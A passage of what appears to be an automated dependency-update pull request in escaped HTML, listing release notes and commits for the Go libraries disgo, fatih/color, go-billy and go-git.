href=\"https://redirect.github.com/disgoorg/disgo/pull/527\"\u003edisgoorg/disgo#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: guild messages search by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/528\"\u003edisgoorg/disgo#528\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(discord): add \u003ccode\u003eFileFormatWebP\u003c/code\u003e support to role icon CDN endpoint by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/531\"\u003edisgoorg/disgo#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(discord): add \u003ccode\u003eLocaleSpanishLATAM\u003c/code\u003e by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/532\"\u003edisgoorg/disgo#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(rest): add JSON error code \u003ccode\u003e50278\u003c/code\u003e by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/530\"\u003edisgoorg/disgo#530\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: rename duplicate JSON error code by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/533\"\u003edisgoorg/disgo#533\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/iishabakaev\"\u003e\u003ccode\u003e@​iishabakaev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/521\"\u003edisgoorg/disgo#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MohmmedAshraf\"\u003e\u003ccode\u003e@​MohmmedAshraf\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/523\"\u003edisgoorg/disgo#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/524\"\u003edisgoorg/disgo#524\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.19.2...v0.19.3\"\u003ehttps://github.com/disgoorg/disgo/compare/v0.19.2...v0.19.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.19.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(component): update field name from 'value' to 'values' in CheckboxGroupComponent by \u003ca href=\"https://github.com/ikafly144\"\u003e\u003ccode\u003e@​ikafly144\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/517\"\u003edisgoorg/disgo#517\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.19.1...v0.19.2\"\u003ehttps://github.com/disgoorg/disgo/compare/v0.19.1...v0.19.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.19.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: new RadioGroupComponent, CheckboxGroupComponent \u0026amp; CheckboxComponent by \u003ca href=\"https://github.com/topi314\"\u003e\u003ccode\u003e@​topi314\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/510\"\u003edisgoorg/disgo#510\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.19.0...v0.19.1\"\u003ehttps://github.com/disgoorg/disgo/compare/v0.19.0...v0.19.1\u003c/a\u003e\u003c/p\u003e\n\u003ch1\u003ev0.19.0\u003c/h1\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release includes support \u003ca href=\"https://daveprotocol.com/\"\u003eDAVE\u003c/a\u003e (E2EE voice) which will be required for all voice connections starting on March 1st 2026.\nIf you need help or found issues with our implementation please reach out to us via GitHub issues/discussions or our support server (see README.md for invite link).\nFor a basic example see: \u003ca href=\"https://github.com/disgoorg/disgo/blob/v0.19.0/_examples/voice/main.go\"\u003ehttps://github.com/disgoorg/disgo/blob/v0.19.0/_examples/voice/main.go\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!WARNING]\nThis release includes breaking changes. Please review the \u003ca href=\"https://github.com/disgoorg/disgo/blob/HEAD/#breaking-changes\"\u003eBreaking Changes\u003c/a\u003e section below for details.\nIf you need help migrating please reach out to us via GitHub discussions or our support server (see README.md for invite link).\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for AVIF emojis by \u003ca href=\"https://github.com/sebm253\"\u003e\u003ccode\u003e@​sebm253\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/456\"\u003edisgoorg/disgo#456\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/b764859a02a147e4a3c7b1e43c0fd5d6705feeee\"\u003e\u003ccode\u003eb764859\u003c/code\u003e\u003c/a\u003e refactor: rename duplicate JSON error code (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/247294c30138b4cf62b755aa090c0e6f8c764ba3\"\u003e\u003ccode\u003e247294c\u003c/code\u003e\u003c/a\u003e feat(rest): add JSON error code \u003ccode\u003e50278\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/c6d4d9a72a779daa50c365a9ff87083ebf03a21d\"\u003e\u003ccode\u003ec6d4d9a\u003c/code\u003e\u003c/a\u003e feat(discord): add \u003ccode\u003eLocaleSpanishLATAM\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/2fbf502bef92fe40a86c240608b751a2f7727ac1\"\u003e\u003ccode\u003e2fbf502\u003c/code\u003e\u003c/a\u003e feat(discord): add \u003ccode\u003eFileFormatWebP\u003c/code\u003e support to role icon CDN endpoint (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/4c8775e6d2e69b0f8e0977d89469e1343d120070\"\u003e\u003ccode\u003e4c8775e\u003c/code\u003e\u003c/a\u003e feat: guild messages search (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/dd3528ae9dd09c56cac59cfbc4e9adf1565bc263\"\u003e\u003ccode\u003edd3528a\u003c/code\u003e\u003c/a\u003e enable gosec linter \u0026amp; fix issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/90539336e6a69be898ab428cbfa9fe4c3b2a00d3\"\u003e\u003ccode\u003e9053933\u003c/code\u003e\u003c/a\u003e chore: gofumpt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/6c014ea98858dd7981e0097108ab85ef9bf66c61\"\u003e\u003ccode\u003e6c014ea\u003c/code\u003e\u003c/a\u003e update actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/45163fa0411bc23151da437e751a42f328ae4d7b\"\u003e\u003ccode\u003e45163fa\u003c/code\u003e\u003c/a\u003e gofmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/d5d4fbe3873f8c969dc65a1391d035e320b30f23\"\u003e\u003ccode\u003ed5d4fbe\u003c/code\u003e\u003c/a\u003e Fix some lints from golangci-lint\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.18.5...v0.19.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/fatih/color` from 1.18.0 to 1.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fatih/color/releases\"\u003egithub.com/fatih/color's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.25.0 to 0.28.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/246\"\u003efatih/color#246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for issue \u003ca href=\"https://redirect.github.com/fatih/color/issues/230\"\u003e#230\u003c/a\u003e set/unsetwriter symmetric wrt color support detection by \u003ca href=\"https://github.com/ataypamart\"\u003e\u003ccode\u003e@​ataypamart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/243\"\u003efatih/color#243\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: go mod cleanup by \u003ca href=\"https://github.com/sashamelentyev\"\u003e\u003ccode\u003e@​sashamelentyev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/244\"\u003efatih/color#244\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.28.0 to 0.30.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/249\"\u003efatih/color#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/mattn/go-colorable from 0.1.13 to 0.1.14 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/248\"\u003efatih/color#248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate CI and go deps by \u003ca href=\"https://github.com/fatih\"\u003e\u003ccode\u003e@​fatih\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/254\"\u003efatih/color#254\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.31.0 to 0.37.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/268\"\u003efatih/color#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: include escape codes in byte counts from \u003ccode\u003eFprint\u003c/code\u003e, \u003ccode\u003eFprintf\u003c/code\u003e by \u003ca href=\"https://github.com/qualidafial\"\u003e\u003ccode\u003e@​qualidafial\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/282\"\u003efatih/color#282\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.37.0 to 0.40.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/277\"\u003efatih/color#277\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: add nil check for os.Stdout to prevent panic on Windows services by \u003ca href=\"https://github.com/majiayu000\"\u003e\u003ccode\u003e@​majiayu000\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/275\"\u003efatih/color#275\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump dominikh/staticcheck-action from 1.3.1 to 1.4.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/259\"\u003efatih/color#259\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/273\"\u003efatih/color#273\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize Color.Equals performance (O(n²) → O(n)) by \u003ca href=\"https://github.com/UnSubble\"\u003e\u003ccode\u003e@​UnSubble\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/269\"\u003efatih/color#269\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/266\"\u003efatih/color#266\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ataypamart\"\u003e\u003ccode\u003e@​ataypamart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/243\"\u003efatih/color#243\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sashamelentyev\"\u003e\u003ccode\u003e@​sashamelentyev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/244\"\u003efatih/color#244\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/qualidafial\"\u003e\u003ccode\u003e@​qualidafial\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/282\"\u003efatih/color#282\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/majiayu000\"\u003e\u003ccode\u003e@​majiayu000\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/275\"\u003efatih/color#275\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/UnSubble\"\u003e\u003ccode\u003e@​UnSubble\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/269\"\u003efatih/color#269\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fatih/color/compare/v1.18.0...v1.19.0\"\u003ehttps://github.com/fatih/color/compare/v1.18.0...v1.19.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/ca25f6e17f118a5a259f3c2c0d395949d1103a5a\"\u003e\u003ccode\u003eca25f6e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/266\"\u003e#266\u003c/a\u003e from fatih/dependabot/github_actions/actions/setup-go-6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/120598440a16510564204450092d1e7925fad9ae\"\u003e\u003ccode\u003e1205984\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/5715c20323d8c79f60d4944831fcfa3b76cd5734\"\u003e\u003ccode\u003e5715c20\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/269\"\u003e#269\u003c/a\u003e from UnSubble/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/2f6e2003760028129f34c4ad5c3728b904811d3c\"\u003e\u003ccode\u003e2f6e200\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/f72ec947d0c34504dfd08b0db68d89f37503fc90\"\u003e\u003ccode\u003ef72ec94\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/273\"\u003e#273\u003c/a\u003e from fatih/dependabot/github_actions/actions/checkout-6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/848e6330af5690fa24bb038d5330839a33f1f0e5\"\u003e\u003ccode\u003e848e633\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/4c2cd3443934693bd8892fc0f7bb5bbec8e3788a\"\u003e\u003ccode\u003e4c2cd34\u003c/code\u003e\u003c/a\u003e Add tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/7f812f029c41eddd3ac7fbbdf6cc78e4b175944b\"\u003e\u003ccode\u003e7f812f0\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/b7fc9f9557629556aff702751b5268cefcbafa15\"\u003e\u003ccode\u003eb7fc9f9\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/259\"\u003e#259\u003c/a\u003e from fatih/dependabot/github_actions/dominikh/staticc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/239a88f715e8e35f40492da7a1e08f7173e78e05\"\u003e\u003ccode\u003e239a88f\u003c/code\u003e\u003c/a\u003e Bump dominikh/staticcheck-action from 1.3.1 to 1.4.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fatih/color/compare/v1.18.0...v1.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-billy/v5` from 5.8.0 to 5.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-billy/releases\"\u003egithub.com/go-git/go-billy/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.9.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse path.Clean instead of filepath.Clean in iofs.Open by \u003ca href=\"https://github.com/puerco\"\u003e\u003ccode\u003e@​puerco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/197\"\u003ego-git/go-billy#197\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate ChrootOS in favour of BoundOS by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/201\"\u003ego-git/go-billy#201\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGeneral Improvements by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/203\"\u003ego-git/go-billy#203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eosfs: ChrootOS eval baseDir on creation by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/205\"\u003ego-git/go-billy#205\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRun go-git tests as part of integration tests by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/206\"\u003ego-git/go-billy#206\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-billy/compare/v5.8.0...v5.9.0\"\u003ehttps://github.com/go-git/go-billy/compare/v5.8.0...v5.9.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/237e529bb8de61704047f71a5ab1c8e6676492f1\"\u003e\u003ccode\u003e237e529\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-billy/issues/206\"\u003e#206\u003c/a\u003e from pjbgf/v5-improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/04edb394b39979b5cbdec30ded6abdcb9f7786c5\"\u003e\u003ccode\u003e04edb39\u003c/code\u003e\u003c/a\u003e build: Add go-git integration test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/d8efefd33b2e8eeea1030e317bb0d71c5e918270\"\u003e\u003ccode\u003ed8efefd\u003c/code\u003e\u003c/a\u003e osfs: preserve empty ChrootOS base\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/07f2a0bf50e42d438d1d9d263c3c8a22598985b8\"\u003e\u003ccode\u003e07f2a0b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-billy/issues/205\"\u003e#205\u003c/a\u003e from pjbgf/v5-improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/25207c8468f1af656953cb5db7030aad5df1fe99\"\u003e\u003ccode\u003e25207c8\u003c/code\u003e\u003c/a\u003e build: Bump Go versions in workflows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/2fda229d9ac0cb5ba654ebc824cfbb90248f82d9\"\u003e\u003ccode\u003e2fda229\u003c/code\u003e\u003c/a\u003e osfs: ChrootOS eval baseDir on creation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/427b27f32f22de11498a682c65cd5060a01ec168\"\u003e\u003ccode\u003e427b27f\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-billy/issues/203\"\u003e#203\u003c/a\u003e from pjbgf/v5-improvements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/7d5a23ece03edc171c1f63c8fa73f84c8428bf17\"\u003e\u003ccode\u003e7d5a23e\u003c/code\u003e\u003c/a\u003e chroot: Reject symlink loops\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/2c2287a233d2ee1e6cdce8956141f6d10505f3bf\"\u003e\u003ccode\u003e2c2287a\u003c/code\u003e\u003c/a\u003e util: avoid following symlinks in RemoveAll fallback\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-billy/commit/cbd88e9a9a2d7fe1065bbe083d8bf0c5fd7290de\"\u003e\u003ccode\u003ecbd88e9\u003c/code\u003e\u003c/a\u003e Fix mount path handling\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/go-git/go-billy/compare/v5.8.0...v5.9.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.18.0 to 5.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.18.0 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2010\"\u003ego-git/go-git#2010\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Bump sha1cd and go-billy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2060\"\u003ego-git/go-git#2060\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ev5: Align object encoding with upstream by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2065\"\u003ego-git/go-git#2065\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.18.0...v5.19.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/bc930f4cbe095a3e1d49273655f73fcef7d41a42\"\u003e\u003ccode\u003ebc930f4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2065\"\u003e#2065\u003c/a\u003e from go-git/commit-v5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/d315264343cead712aa9eb56475c2ec96f5ecef1\"\u003e\u003ccode\u003ed315264\u003c/code\u003e\u003c/a\u003e plumbing: object, Reset object before decode\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/6e1d34890a4dae8a0df738e531234bd60b7e9b66\"\u003e\u003ccode\u003e6e1d348\u003c/code\u003e\u003c/a\u003e plumbing: object, Align Tree handling with upstream\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/e134ba34cf95ed0167e5b1df36a933d7bde9d02d\"\u003e\u003ccode\u003ee134ba3\u003c/code\u003e\u003c/a\u003e tests: Skip double checks in Git v2.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/1971422f6b1bec9176061b3293306981cfff981e\"\u003e\u003ccode\u003e1971422\u003c/code\u003e\u003c/a\u003e tests: Add git conformance tests for signing verification\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/a387aa8857a8fbba8e74b7f5485e9e030669ab5d\"\u003e\u003ccode\u003ea387aa8\u003c/code\u003e\u003c/a\u003e plumbing: object, Add ErrMalformedTag\u003c/li\u003e\n\u003cli\u003e\u003ca 